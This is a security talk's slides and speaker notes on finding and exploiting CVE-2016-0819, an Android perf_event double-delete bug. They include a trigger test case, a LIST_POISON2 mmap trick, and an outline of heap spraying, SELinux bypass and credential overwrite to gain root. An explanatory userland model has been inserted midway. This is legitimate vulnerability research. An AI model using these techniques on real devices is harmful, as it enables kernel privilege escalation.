Perf: From Profiling to Kernel Exploiting
@Wish_Wu
Mobile Threat Response Team
0 The Perf
Performance counters = hardware features (CPU/PMU, Performance Monitoring Unit) + software features (software counters, tracepoints).
Running "man perf_event_open" shows 1233 lines of description.
Userspace command: perf
Userspace tool source code: tools/perf
Related syscalls: perf_event_open, ioctl, mmap, prctl, close
Kernel source code: kernel/events/*, arch/<arch>/kernel/*
0 The Perf in Android
• The perf_event_open syscall is enabled on most of the latest smartphones.
• There is no strong relationship between the Android version and the vendor-customized Linux kernel version. Vendors can also customize their Linux kernel and SELinux policy. Most Android versions from 4.4.4 to 6.0.1 have this syscall enabled.
• An application that holds no permissions at all can invoke this syscall.
• Many CPU vendors add their PMU support to Linux for specific performance testing. This code is not merged into mainline Linux, so it may not be fully reviewed.
0 The Perf in Android
[Figure: nested code layers Kernel > Perf Subsystem > Architecture Specific > Vendor Specific, with the innermost (vendor-specific) box marked "Bug"]
0 The Perf in Android
How to detect bugs
1. perf_fuzzer (Vincent M. Weaver and Dave Jones)
http://web.eece.maine.edu/~vweaver/projects/perf_events/fuzzer/2015_perf_fuz
https://github.com/deater/perf_event_tests
2. Trinity
https://github.com/kernelslacker/trinity
3. Code Review
4. Tools written by myself
0 The Perf in Android
Android security bulletins:
http://source.android.com/security/bulletin/2016-02-01.html
http://source.android.com/security/bulletin/2016-03-01.html
http://source.android.com/security/bulletin/2016-04-02.html

Published bugs:
CVE           | Bug               | Severity | Updated versions              | Date reported
CVE-2016-0805 | ANDROID-25773204* | Critical | 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 | Nov 15, 2015
CVE-2016-0819 | ANDROID-25364034* | Critical | 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 | Oct 29, 2015
CVE-2016-0843 | ANDROID-25801197* | Critical | 4.4.4, 5.0, 5.1.1, 6.0, 6.0.1 | Nov 19, 2015

Unpublished bugs:
Bug                | Severity | Issue
AndroidID-26112842 | Low      | https://code.google.com/p/android/issues/detail?id=196588
AndroidID-28086229 | Critical | https://code.google.com/p/android/issues/detail?id=206153
1 The Bug
CVE-2016-0819
Possibly affected (and not limited to):
Samsung: GALAXY Note Edge, GALAXY Note 4, GALAXY A9, GALAXY A8, GALAXY A7, GALAXY A5, GALAXY On7, GALAXY J7, GALAXY J5, GALAXY J3
Sony: Xperia Z5, Xperia Z4, Xperia Z3, Xperia E3
LG: G5, G4, G4c, Nexus 5X
Motorola: Nexus 6
Huawei: Nexus 6P
1 The Bug
file: kernel/events/core.c (vendor kernel; the constraint_duplicate check is not in mainline)
```c
static int perf_release(struct inode *inode, struct file *file)
{
	struct perf_event *event = file->private_data;

	/*
	 * Event can be in state OFF because of a constraint check.
	 * Change to ACTIVE so that it gets cleaned up correctly.
	 */
	if ((event->state == PERF_EVENT_STATE_OFF) &&
	    event->attr.constraint_duplicate)
		event->state = PERF_EVENT_STATE_ACTIVE;

	put_event(file->private_data);
	return 0;
}
```
1 The Bug
file: kernel/events/core.c (excerpt from event_sched_out())
```c
	if (event->state != PERF_EVENT_STATE_ACTIVE)
		return;

	event->state = PERF_EVENT_STATE_INACTIVE;
	if (event->pending_disable) {
		event->pending_disable = 0;
		event->state = PERF_EVENT_STATE_OFF;
	}
	event->tstamp_stopped = tstamp;
	event->pmu->del(event, 0);	/* for a tracepoint event this is the hlist delete that ends up running twice */
	event->oncpu = -1;
```
1 The Bug
Test case code (perf_event_open has no libc wrapper, so it is invoked through syscall()):
```c
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/perf_event.h>

struct perf_event_attr attr;
memset(&attr, 0, sizeof(attr));
attr.type = PERF_TYPE_TRACEPOINT;
attr.size = sizeof(attr);
attr.config = value; // read from /sys/kernel/debug/tracing/events/*
__u64 *ptr = &attr.config;
ptr++;
*ptr |= 1 << 23; // set the vendor-added constraint_duplicate bit to 1
int fd = syscall(__NR_perf_event_open, &attr, 0, -1, -1, 0);
// use ioctl() to delete the perf_event from the list the first time
ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
// use close() to delete the perf_event from the list a second time, and free it
close(fd);
```
1 The Bug
1. The bug can double delete an hlist node.
2. For kernel lists, delete != free.
3. A deleted node can be added to the hlist again.
4. Nodes can only be added at the hlist head, but can be deleted from anywhere.
2 Double delete
```c
// An hlist node is defined as below:
struct hlist_node {
	struct hlist_node *next;
	struct hlist_node **pprev;
};
// An hlist head is defined as below:
struct hlist_head {
	struct hlist_node *first;
};
```
[Figure: a Head whose first pointer leads to a chain of Nodes; each Node carries a next pointer to the following node and a pprev pointer back to the previous node's next field]
2 Double delete
LIST_POISON2 == 0x00200200 in 32-bit Android.
```c
mmap((void *)0x200200, 0x1000, PROT_READ|PROT_WRITE,
     MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
mlock((void *)0x200200, 0x1000);
```
Google's fix: LIST_POISON2 changed to 0x00000200, which is below mmap_min_addr and therefore cannot be mapped from userspace.
2 Double delete
[Figure: the hlist as a chain of the poison slot at 0x200200, Node10, Node20, Node30 and Node40, each with next and pprev pointers]
Sequence:
1. ioctl(PERF_EVENT_IOC_DISABLE) deletes Node20.
2. close() deletes Node20 a second time.
3. close() deletes Node30.
Result: Node30's address is leaked to userspace (it is written into the memory at 0x200200), and Node10's next pointer now points to freed memory: Use After Free!
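To make the sequence above and the earlier "delete != free" point concrete, here is an added example (my own userland model, not code from the talk or from the kernel tree): it reimplements hlist_add_head() and hlist_del_rcu() with the kernel's semantics and replays the Node10..Node40 steps, showing the address written through the poisoned pprev and the dangling Node10->next. poison_page stands in for the memory at LIST_POISON2, and hlist_del_rcu_checked() is an illustrative guard against the second delete, not the fix Google shipped.

```c
#include <stddef.h>

/* Userland copies of the kernel's hlist types. */
struct hlist_node { struct hlist_node *next; struct hlist_node **pprev; };
struct hlist_head { struct hlist_node *first; };

/* Stand-in for the memory at LIST_POISON2 (0x200200 on 32-bit Android): whatever
 * is written through a poisoned pprev lands here. Constructed for this demo. */
static struct hlist_node poison_page;
#define LIST_POISON2 (&poison_page.next)

/* Mirrors hlist_add_head(): nodes can only be added at the head. */
static void hlist_add_head(struct hlist_node *n, struct hlist_head *h)
{
    struct hlist_node *first = h->first;
    n->next = first;
    if (first)
        first->pprev = &n->next;
    h->first = n;
    n->pprev = &h->first;
}

/* Mirrors __hlist_del(): unlink through pprev, then fix up the successor. */
static void hlist_unlink(struct hlist_node *n)
{
    struct hlist_node *next = n->next, **pprev = n->pprev;
    *pprev = next;
    if (next)
        next->pprev = pprev;
}

/* Mirrors hlist_del_rcu(): only pprev is poisoned; next is kept for RCU readers.
 * A second delete therefore writes the old successor through LIST_POISON2. */
static void hlist_del_rcu(struct hlist_node *n)
{
    hlist_unlink(n);
    n->pprev = LIST_POISON2;
}

/* Illustrative guard (not the fix Google shipped): refuse to delete a node that
 * is already unlinked, as hlist_unhashed() would detect. Returns 1 if deleted. */
static int hlist_del_rcu_checked(struct hlist_node *n)
{
    if (n->pprev == NULL || n->pprev == LIST_POISON2)
        return 0;
    hlist_unlink(n);
    n->pprev = NULL;
    return 1;
}

struct demo_result {
    int poison_holds_node30;  /* *LIST_POISON2 == Node30: the address leak */
    int node10_next_dangles;  /* Node10->next still == Node30 after Node30 is gone */
};

/* Replays the slide: ioctl deletes Node20, close deletes Node20 again, close
 * deletes Node30. "Freed" nodes are left in place so stale links can be read. */
struct demo_result replay_double_delete(void)
{
    struct hlist_head head = { NULL };
    struct hlist_node n[4];           /* n[0]..n[3] stand for Node10..Node40 */
    struct demo_result r = { 0, 0 };
    poison_page.next = NULL;
    for (int i = 3; i >= 0; i--)      /* add in reverse to get 10,20,30,40 */
        hlist_add_head(&n[i], &head);
    hlist_del_rcu(&n[1]);             /* ioctl(PERF_EVENT_IOC_DISABLE): Node20 */
    hlist_del_rcu(&n[1]);             /* close(): Node20 again, *LIST_POISON2 = Node30 */
    r.poison_holds_node30 = (poison_page.next == &n[2]);
    hlist_del_rcu(&n[2]);             /* close(): Node30 unlinks via the poison page */
    r.node10_next_dangles = (n[0].next == &n[2]);
    return r;
}

/* Same sequence through the guarded delete: the second call is refused and the
 * list stays intact. Returns 1 when that holds. */
int replay_with_guard(void)
{
    struct hlist_head head = { NULL };
    struct hlist_node a, b;
    hlist_add_head(&b, &head);
    hlist_add_head(&a, &head);
    return hlist_del_rcu_checked(&b) == 1 && hlist_del_rcu_checked(&b) == 0
        && head.first == &a && a.next == NULL;
}
```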
2 Double delete
Simple? No!
2 Double delete
3 Ret2dir Tech
Vasileios P. Kemerlis, Michalis Polychronakis, Angelos D. Keromytis
http://www.cs.columbia.edu/~vpk/papers/ret2dir.sec14.pdf
3 Ret2dir Tech
This node will be reused. I put data here.
4 Get Root
GeekBen's TowelRoot Source Code:
https://github.com/geekben/towelroot/blob/master/towelroot.c
1. addr_limit = 0xffffffff
2. selinux_enforcing = 0 to bypass SELinux
3. Modify struct cred and the SELinux security object.
4 Get Root
Demo
Thank You

Editor's Notes

  1. Performance counters for Linux are a new kernel-based subsystem that provides a framework for performance analysis. They cover both hardware features and software features.
  2. The perf_event_open syscall is enabled on most of the latest smartphones. There is no strong relationship between the Android version and the Android-customized Linux version. Vendors can also customize their Linux kernel and SELinux policy. Most Android 4.4.4 to 6.0.1 versions have enabled this syscall. An application which has no permission required can invoke this syscall. Many CPU vendors would like to add their PMU to Linux for specific performance testing. This code will not be merged into the mainline of Linux, so it may not be totally reviewed.
  3. Here is the code relationship of perf. The perf subsystem has a lot of architecture- and vendor-related code; much of it is added by vendors and is not in the Linux mainline. The red square marks the position where the bugs mostly exist.
  4. Here are 4 ways for me to detect bugs in perf. Thanks to these two guys; they released a paper and a perf_fuzzer tool, which helped me a lot. Trinity is a well-known system call fuzzer. It sometimes helps me. Then you should read the code by yourself and write tools to test specific code.
  5. I have found five bugs in the perf subsystem of Android. Google has published three of them. CVE-2016-0805 and CVE-2016-0843 are out-of-bounds access bugs in the kernel. Here, the unpublished critical bug can root the Nexus 6P.
  6. I will exploit the critical bug CVE-2016-0819 to get root on a Nexus 6. This bug exists in all Android smartphones which have a Qualcomm CPU and a Linux 3.10 series kernel.
  7. Here is the bug-related source code. The red lines are added by Qualcomm or Google. The variable constraint_duplicate is added into the function perf_release. Once we invoke close() with the variable constraint_duplicate set to 1, the event state will be changed from OFF to ACTIVE again.
  8. If we set constraint_duplicate in user space, a double delete of a node will occur.
  9. Here is a test case. We can use perf_event_open, ioctl and close to trigger this bug; it will then crash the whole system.
  10. But we should remember four key things. Delete does not equal free (points 1, 2, 3, 4).
  11. This shows the hlist. Every node has a next pointer which points to the next node; they also have a pprev pointer which points to the previous node. The hlist starts from a list head.
  12. Here is the node delete function of hlist. When deleting a node, the pprev pointer of the node will be set to LIST_POISON2. LIST_POISON2 = 0x200200. We can then use a memory map to put memory space at that address. I use the parameter MAP_POPULATE and mlock to make sure physical memory is mapped to the virtual address 0x200200. In March's Security Bulletin, Google set LIST_POISON2 to 0x00000200. When the value is smaller than mmap_min_addr, it mitigates the problem.
  13. Here I will demo the double delete operation. I assume there are four nodes, Node10 to Node40. They are connected with each other. First I will control Node20. Now Node10 will connect to Node30 and Node30's pprev pointer will connect to Node10. Node20's pprev pointer will connect directly to 0x200200. Next I close Node20. The program will treat the memory at address 0x200200 as a node. The next pointer of node 0x200200 will point to Node30. Now we leak Node30's address to user space. Node20 is now freed. Then I close Node30 and Node30 is freed. Now Node10's next pointer points to free space. Use After Free.
  14. We must create a "grace period" to run hlist_del_rcu. An easy way to do this is calling sleep(). The grace period is a term of RCU. RCU means read, copy, update. RCU will delay the delete operation. But if we invoke sleep(), the process will be scheduled out of the CPU. All nodes will be deleted from the list. After sleep() returns, all nodes will need to be added back into the list again. That will create an infinite loop in the list. This is the side effect of invoking sleep(). So how do we refill the freed node?
  15. I try to create this memory layout in the kernel. Every 4 perf_event objects are located on one page. But the fd numbers may not equal the image described. The real situation is more complicated. One process can have only 1024 fds, so forking more child processes makes it easier to create the memory layout.
  16. Thanks to these three guys; they supplied the technology that enabled me to spray random data to kernel space and still know where it is.
  17. According to the kernel memory reuse rule, I exploited the UAF bug: 1. By continuously exposing the next node address until I found a node at the start of a page. 2. I then freed one more page to increase the spray success rate. 3. Using ret2dir technology I sprayed data to the node at the beginning of the page. 4. I commanded the kernel to traverse the list and used a function pointer that I controlled.
  18. The root work is very like GeekBen's TowelRoot source code: I set the address limit of the thread to the maximum integer value. This enabled me to read and write the whole kernel space. Next I set the SELinux enforcing variable to 0 to bypass SELinux. Modifying the credentials and the SELinux security object, we now have root.
  19. Now I show my exploit here. At the moment it is unstable. It may fail or crash the system. Using adb shell is more successful. If I fail I will try again. Now it forks more child processes; every child process has 1000 fds. It increases the memory space to low virtual addresses. I found a node at a page start, and I try to spray data to this address. Oops, it failed.
  20. Thank you everyone for your attention. Today I have introduced to you a new Android bug pool to help protect our customers' security better. I am happy now to answer any questions you may have.